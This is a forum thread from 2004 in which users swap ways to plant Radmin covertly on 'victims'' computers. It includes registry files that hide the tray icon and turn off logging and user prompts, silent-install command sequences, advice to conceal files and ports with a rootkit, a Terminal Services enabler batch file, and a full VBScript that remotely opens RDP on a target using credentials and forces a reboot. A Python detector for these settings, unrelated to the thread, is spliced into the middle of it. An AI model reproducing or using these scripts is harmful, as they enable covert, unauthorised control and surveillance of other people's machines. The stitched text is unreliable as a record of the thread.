extreme
Feb 14 2004, 02:58 AM
I saw somewhere a command line and instructions on how to do this, but I can't find it now... So if someone can please write it up, I would be thankful..
I wish to run Radmin on the victim's comp so I can go to Control Panel>>Components Install, and then install Terminal Service and Terminal Licence from there...
Is there any better program for this, which allows me to see and control someone's desktop and programs?
x1`
Feb 14 2004, 03:06 AM
the only problem is getting it to hide in the bar along the bottom on windows xp. anyone know how to hide it?
phaeton
Feb 14 2004, 03:11 AM
I wrote myself a script in NSIS where all you do is a site exec; it installs the service, hides the tray icon, sets a password and starts the service all in one convenient package. That way I have radmin completely hidden under my rootkit.
x1`
Feb 14 2004, 03:22 AM
please can u post it here. i really could be doing with something like this
Zekk
Feb 14 2004, 04:47 AM
same ^
eXist
Feb 14 2004, 06:06 AM
Give it a go by changing radmin.reg to:
CODE:
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters]
"Port"=hex:23,13,00,00
"Timeout"=hex:0a,00,00,00
"EnableLogFile"=hex:00,00,00,00
"LogFilePath"="c:\\logfile.txt"
"FilterIp"=hex:00,00,00,00
"DisableTrayIcon"=hex:00,00,00,00
"AutoAllow"=hex:00,00,00,00
"AskUser"=hex:00,00,00,00
"EnableEventLog"=hex:00,00,00,00
Save it. As for the site exec command, use this in FlashFXP, or something similar:
CODE:
site exec regedit /s radmin.reg
site exec netvcs.exe /install /silence
site exec net start netvcs
site exec netvcs /pass:password /save /silence
site exec netvcs /start /silence
Please note, it is netvcs, because that's what my .exe is called. Also, you can save all this into one command to make things easier.
saetji
Feb 14 2004, 12:00 PM
QUOTE:
c:
cd c:\winnt\system32\
explore /install /silence
explore /port:31337 /pass:HACKED /save /silence
regedit /s 1.reg
del 1.reg
net start r_server
cd..
where 1.reg is:
QUOTE:
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters]
"DisableTrayIcon"=hex:01,00,00,00
This will hide the icon and install the thing silently ... btw as u might have guessed - those aren't my passes/port info - so don't get any ideas
paskaluis
Feb 14 2004, 03:12 PM
thx for the 1.reg code
saetji
Feb 14 2004, 03:48 PM
you're welcome - i got tons of code - just can't be arsed to sift through 300gb of disk space to find the useful stuff
phaeton
Feb 14 2004, 05:29 PM
Later today I'll post my NSIS installer script.
extreme
Feb 14 2004, 07:06 PM
you posted different values for "DisableTrayIcon"=hex:01,00,00,00 and "DisableTrayIcon"=hex:00,00,00,00. What is the right one?
P.S. Does anyone know what is command for BAT file autodelete itself when executed?
x1`
Feb 14 2004, 07:19 PM
so just make this a batch file and run the batch file then?
saetji
Feb 14 2004, 07:35 PM
the one i use hides the tray icon
AsuKa
Feb 14 2004, 07:44 PM
QUOTE:
"DisableTrayIcon"=hex:01,00,00,00
That is the value you want to hide the tray. I have noticed that sometimes on XP it doesn't want to hide the tray icon; it only happened twice where I couldn't get it to hide. anyone else experience this with XP?
Stephen79
Feb 14 2004, 07:51 PM
this is what i use:
CODE:
dtreg.exe -Quiet -Set REG_BINARY \HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters\DisableTrayIcon=01000000
Copkill
Feb 14 2004, 08:00 PM
CODE:
dtREG -Set REG_BINARY HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\FilterIp=00000000
dtREG -Set REG_BINARY HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\DisableTrayIcon=01000000
dtREG -Set REG_BINARY HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\AutoAllow=00000000
dtREG -Set REG_BINARY HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\AskUser=00000000
dtREG -Set REG_BINARY HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\EnableEventLog=00000000
extreme
Feb 14 2004, 08:49 PM
QUOTE:
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0
The newest version is 2.1... Has anyone checked if this Reg value changed then??
P.S. Is there any other RAT that allows controlling the desktop like Radmin? Maybe there are better and smaller tools and we are all stuck on RA.... Of course, it would have to be undetectable... And is there some tool that allows controlling your very own instance of the Desktop which will be invisible to all other users? I mean just like in Terminal Services...
saetji
Feb 15 2004, 12:56 AM
there's remote anything - u only upload a 30k file i think with it and it's encrypted so only u can axs it
BUT i think it's detected by most antiviruses + it's a hassle to change
phaeton
Feb 15 2004, 05:59 AM
you can use winvnc... and that regkey value is correct, famatech just uses an old string to put their values in. sorry about the lack of the nsis package, was out all day today, tomorrow i promise
Edvon
Feb 17 2004, 12:05 AM
QUOTE (extreme @ Feb 14 2004, 08:49 PM):
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0
The newest version is 2.1... Has anyone checked if this Reg value changed then??
QUOTE:
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters]
"DisableTrayIcon"=hex:01,00,00,00
works fine with 2.1 :thumbsup:
ellitio
Feb 17 2004, 12:13 AM
and execute the following commands:
regedit /s c:\winnt\system32\radmin.reg
c:\winnt\system32\r_server.exe /install /silence
c:\winnt\system32\r_server.exe /pass:PASSWORDHERE /port:4899 /save /silence
c:\winnt\system32\r_server.exe /start /silence
installs radmin with a password of PASSWORDHERE on port 4899 (it hides the tray icon! + NO logfile)
-=KD=-
Feb 19 2004, 03:36 PM
thx for the code guys  and btw, send ur hdd over I'll take care of it for u
Zekk
Feb 19 2004, 04:22 PM
thx, just what I wanted. will try radmin instead of terminal service
saetji
Feb 19 2004, 05:22 PM
send me over a coupla thousand pounds and i'll send u my hd
jimmy
Feb 19 2004, 10:30 PM
to autodelete bat ?? lol is this really a question ? what could it be ? if the bat is called install.bat, just put a last line into it like del install.bat >> Damn that was hard to think of
o0oKARo0o
Feb 20 2004, 01:35 AM
I tried to unpack radmin so i can modify the service name etc but there is no way i can find the packer that has been used.. Anyone know how to unpack it??
phaeton
Feb 20 2004, 04:37 AM
there is an app in the filedownloads section (which you don't have access to). just search for xnet in google, it modifies services and you can modify the service name AFTER it's installed.
illwill
Feb 20 2004, 05:17 AM
ellitio i'd appreciate it if you didn't name your .rar after my program of the same name http://www.illmob.org/0day/illmob_apps/ghostradmin.zip which is the webdler i coded a few months back that downloads the radmin files onto someone's box and installs it silently
--Elite--
Feb 20 2004, 07:32 AM
there is a faster way to install Radmin / TS on ur victim ( maybe ur server ). for Radmin, install and configure the server on your own system ( for being hidden, configure it so it hides the tray icon ) and then extract the settings from the registry by Regedit. would be something like this:
QUOTE:
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin]

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0]

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server]

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\iplist]

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters]
"Port"=hex:f0,12,00,00
"Parameter"=hex:8c,c1,b9,ff,7b,d7,a0,fc,96,1d,2f,67,b0,f7,82,5a
"NTAuthEnabled"=hex:00,00,00,00
"Timeout"=hex:0a,00,00,00
"EnableLogFile"=hex:00,00,00,00
"LogFilePath"="c:\\logfile.txt"
"FilterIp"=hex:00,00,00,00
"DisableTrayIcon"=hex:01,00,00,00
"AutoAllow"=hex:00,00,00,00
"AskUser"=hex:00,00,00,00
"EnableEventLog"=hex:00,00,00,00
then upload this .reg file + the server.exe file + 2 DLLs which are required ( Admdll.dll and Raddrv.dll ) to the victim pc. install the reg key by this command: " regedit -s radmin.reg " then run the server ( for example RD-server.exe ) with NO switch. then connect. for more privacy, u can use a rootkit to hide the port u used and the files u've uploaded and executed on the server. don't forget, u have 3 files and 1 process to hide by ur rootkit! if it's possible for u ( better say for ur rootkit ) try to hide the communication ports too. and for installing Terminal service ( Remote Desktop ) remotely, the best way is to use already available scripts. these just need access to the RPC service and of course an administrator level account. here is a batch file which installs it (TS) ( works locally! )
QUOTE:
echo off
@echo :::::::::::::::::::::::::::::::::::::
@echo ::: Auto Terminal Service enabler :::
@echo ::: works on XP/2000 . :::
@echo ::: By --Elite-- :::
@echo :::::::::::::::::::::::::::::::::::::
@echo (=-)Processing batch jobe..."
echo Windows Registry Editor Version 5.00> c:\TS.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]>> c:\TS.reg
echo "Start"=dword:00000002>> c:\TS.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>> c:\TS.reg
echo "AllowTSConnections"=dword:00000001>> c:\TS.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>> c:\TS.reg
echo "fDenyTSConnections"=dword:00000000>> c:\TS.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>> c:\TS.reg
echo "fAllowToGetHelp"=dword:00000001>> c:\TS.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]>> c:\TS.reg
echo "AllowMultipleTSSessions"=dword:00000001>> c:\TS.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]>> c:\TS.reg
echo "AutoAdminLogon"="1">> c:\TS.reg
@echo (=-)Registering the service...
REGEDIT /S C:\TS.REG
echo [Components] > c:\bootlog~.txt
echo TSEnabled = on >> c:\bootlog~.txt
sysocmgr /i:%windir%\inf\sysoc.inf /u:c:\bootlog~.txt /q
DEL /Q c:\TS.REG
DEL /Q c:\bootlog~.txt
@echo (=-)Service registered succesfully !
@echo (=-)Service would start on next reboot:)
@echo (=-)connect to default port ( 3389 )
@echo :::::::::::::::::::::::::::::::::::::
but for remote installation u can use this one. it's a VBE script. copy/paste it into a .vbe file and run it like this:
cscript TS-enable.vbe
hint: DO NOT use the default port if u wanna stay anonymous, although there are easy/quick ways to determine if TS is installed on a system or not.
QUOTE:
on error resume next
set outstreem=wscript.stdout
set instreem=wscript.stdin
if (lcase(right(wscript.fullname,11))="wscript.exe") then
set objShell=wscript.createObject("wscript.shell")
objShell.Run("cmd.exe /k cscript //nologo "&chr(34)&wscript.scriptfullname&chr(34))
wscript.quit
end if
if wscript.arguments.count<3 then
usage()
wscript.echo "Not enough parameters."
wscript.quit
end if
ipaddress=wscript.arguments(0)
username=wscript.arguments(1)
password=wscript.arguments(2)
if wscript.arguments.count>3 then
port=wscript.arguments(3)
else
port=3389
end if
if not isnumeric(port) or port<1 or port>65000 then
wscript.echo "The number of port is error."
wscript.quit
end if
if wscript.arguments.count>4 then
reboot=wscript.arguments(4)
else
reboot=""
end if
usage()
outstreem.write "Conneting "&ipaddress&" ...."
set objlocator=createobject("wbemscripting.swbemlocator")
set objswbemservices=objlocator.connectserver(ipaddress,"root/cimv2",username,password)
showerror(err.number)
objswbemservices.security_.privileges.add 23,true
objswbemservices.security_.privileges.add 18,true
outstreem.write "Checking OS type...."
set colinstoscaption=objswbemservices.execquery("select caption from win32_operatingsystem")
for each objinstoscaption in colinstoscaption
if instr(objinstoscaption.caption,"Server")>0 then
wscript.echo "OK!"
else
wscript.echo "OS type is "&objinstoscaption.caption
outstreem.write "Do you want to cancel setup?[y/n]"
strcancel=instreem.readline
if lcase(strcancel)<>"n" then wscript.quit
end if
next
outstreem.write "Writing into registry ...."
set objinstreg=objlocator.connectserver(ipaddress,"root/default",username,password).get("stdregprov")
HKLM=&h80000002
HKU=&h80000003
with objinstreg
.createkey ,"SOFTWARE\Microsoft\Windows\CurrentVersion\netcache"
.setdwordvalue HKLM,"SOFTWARE\Microsoft\Windows\CurrentVersion\netcache","Enabled",0
.createkey HKLM,"SOFTWARE\Policies\Microsoft\Windows\Installer"
.setdwordvalue HKLM,"SOFTWARE\Policies\Microsoft\Windows\Installer","EnableAdminTSRemote",1
.setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Control\Terminal Server","TSEnabled",1
.setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Services\TermDD","Start",2
.setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Services\TermService","Start",2
.setstringvalue HKU,".DEFAULT\Keyboard Layout\Toggle","Hotkey","1"
.setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp","PortNumber",port
end with
showerror(err.number)
rebt=lcase(reboot)
flag=0
if rebt="/r" or rebt="-r" or rebt="\r" then flag=2
if rebt="/fr" or rebt="-fr" or rebt="\fr" then flag=6
if flag<>0 then
outstreem.write "Now, reboot target...."
strwqlquery="select * from win32_operatingsystem where primary='true'"
set colinstances=objswbemservices.execquery(strwqlquery)
for each objinstance in colinstances
objinstance.win32shutdown(flag)
next
showerror(err.number)
else
wscript.echo "You need to reboot target."&vbcrlf&"Then,"
end if
wscript.echo "You can logon terminal services on "&port&" later. Good luck!"
function showerror(errornumber)
if errornumber Then
wscript.echo "Error 0x"&cstr(hex(err.number))&" ."
if err.description <> "" then
wscript.echo "Error description: "&err.description&"."
end if
wscript.quit
else
wscript.echo "OK!"
end if
end function
function usage()
wscript.echo string(79,"*")
wscript.echo "ROTS v1.05"
wscript.echo "Remote Open Terminal services Script, by ??"
wscript.echo "Welcome to visite www.5458.net"
wscript.echo "Usage:"
wscript.echo "cscript "&wscript.scriptfullname&" targetIP username password [port] [/r|/fr]"
wscript.echo "port: default number is 3389."
wscript.echo "/r: auto reboot target."
wscript.echo "/fr: auto force reboot target."
wscript.echo string(79,"*")&vbcrlf
end function
hope these help u .
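The thread's registry fragments (eXist's radmin.reg above and --Elite--'s Radmin export and TS.reg) are also what a defender would look for on a host. Below is an added example, not code from the thread or from Radmin, that parses a .reg export, decodes the little-endian hex: DWORDs (so "Port"=hex:23,13,00,00 reads as 4899), and reports the stealth settings discussed here. The sample export is constructed, and the rule list and finding texts are my own choices.

```python
import re

# Constructed sample .reg export with the Radmin server parameters and Terminal
# Services keys the thread recommends setting (not captured from a real host).
SAMPLE_REG = r'''Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters]
"Port"=hex:23,13,00,00
"EnableLogFile"=hex:00,00,00,00
"DisableTrayIcon"=hex:01,00,00,00
"AskUser"=hex:00,00,00,00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"AutoAdminLogon"="1"
'''
RADMIN = r'HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters'
TS = r'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server'
WINLOGON = r'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'

def parse_reg(text):
    """Map key path -> {value name: value}; hex:/dword: become little-endian ints."""
    tree, key = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith('[') and line.endswith(']'):
            key = line[1:-1]
            tree.setdefault(key, {})
        elif key and (m := re.match(r'"([^"]+)"=(.*)', line)):
            name, raw = m.groups()
            if raw.startswith('hex:'):      # comma-separated bytes, least significant first
                tree[key][name] = int.from_bytes(bytes.fromhex(raw[4:].replace(',', '')), 'little')
            elif raw.startswith('dword:'):  # eight hex digits written as a normal number
                tree[key][name] = int(raw[6:], 16)
            else:                           # quoted string value
                tree[key][name] = raw.strip('"')
    return tree

# (key, value name, value that marks the stealth setting, finding text)
RULES = [
    (RADMIN, 'DisableTrayIcon', 1, 'Radmin tray icon hidden'),
    (RADMIN, 'EnableLogFile', 0, 'Radmin file logging disabled'),
    (RADMIN, 'AskUser', 0, 'Radmin accepts sessions without asking the user'),
    (TS, 'fDenyTSConnections', 0, 'Terminal Services connections enabled'),
    (WINLOGON, 'AutoAdminLogon', '1', 'automatic administrator logon enabled'),
]

def find_indicators(text):
    """Return matching findings plus the configured Radmin port, if any."""
    tree = parse_reg(text)
    hits = [msg for key, name, bad, msg in RULES if tree.get(key, {}).get(name) == bad]
    port = tree.get(RADMIN, {}).get('Port')
    if port is not None:
        hits.append('Radmin port %d%s' % (port, '' if port == 4899 else ' (non-default)'))
    return hits
```

Run it against `reg export HKLM\SYSTEM\RAdmin` output from a suspect host; the non-default port branch covers exports like --Elite--'s "Port"=hex:f0,12,00,00 (4848).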
Edvon
Feb 20 2004, 02:00 PM
QUOTE (--Elite-- @ Feb 20 2004, 07:32 AM):
then upload this .reg file + the server.exe file + 2 DLLs which are required ( Admdll.dll and Raddrv.dll )
Is the Raddrv.dll really required?
--Elite--
Feb 20 2004, 06:59 PM
Edvon, I really never tested it. i recommend it only cus it's included in the directory of Radmin. it may be required for the client part. i did NOT test it. i added this one cus i usually use the tunneling ability of radmin, and thought to myself it may be needed
ellitio
Feb 20 2004, 08:17 PM
QUOTE (illwill @ Feb 20 2004, 05:17 AM):
ellitio i'd appreciate it if you didn't name your .rar after my program of the same name http://www.illmob.org/0day/illmob_apps/ghostradmin.zip which is the webdler i coded a few months back that downloads the radmin files onto someone's box and installs it silently
ghostradmin.zip had already been made before you made it.... and it's not .zip but .rar
illwill
Feb 20 2004, 11:16 PM
first off i made my program in september of last year.. secondly who the (filtered) cares if it's in a .zip or .rar, it's still called the same name as my program ...
Edvon
Feb 21 2004, 01:04 AM
@--Elite-- Its not required for the client and the server does also work without it...well ermm :dunno:
--Elite--
Feb 21 2004, 07:25 AM
Hi again. Dear Edvon, I did some searching about Raddrv.dll. it's not required, but BETTER TO HAVE. as i found on the vendor site's forum, this dll is middleware for transferring movements for remote-desktop control. Radmin does not capture the screen to make it visible for u. raddrv.dll gets some basic info from the video controller of the os, transfers it to the client part, and the client rebuilds the screen for u upon that info. it acts like a remote AGP slot. this is why Radmin is so fast in refreshing the screen with high Q. so, if we upload this dll, we would have faster/better communication. this is the original post i found:
QUOTE:
VI. Common questions
How does the screen update so fast? The raddrv.dll is a video hook driver that reads the graphical output of the screen as it is being generated by the video drivers. Instead of screen dumping it is only sending specific data as to areas of the screen that have changed since the last frame. This allows for less network traffic and better screen quality. The bitmaps are highly compressed and encrypted using the fast Twofish algorithm. The client and server are constantly comparing small notes on what needs to be updated on the client's screen. This is an awesome feature of Radmin.
Edvon
Feb 21 2004, 11:16 AM
Dear --Elite-- ^^ nice research
W4r3X
Feb 23 2004, 02:22 PM
Thx For Radmin Silence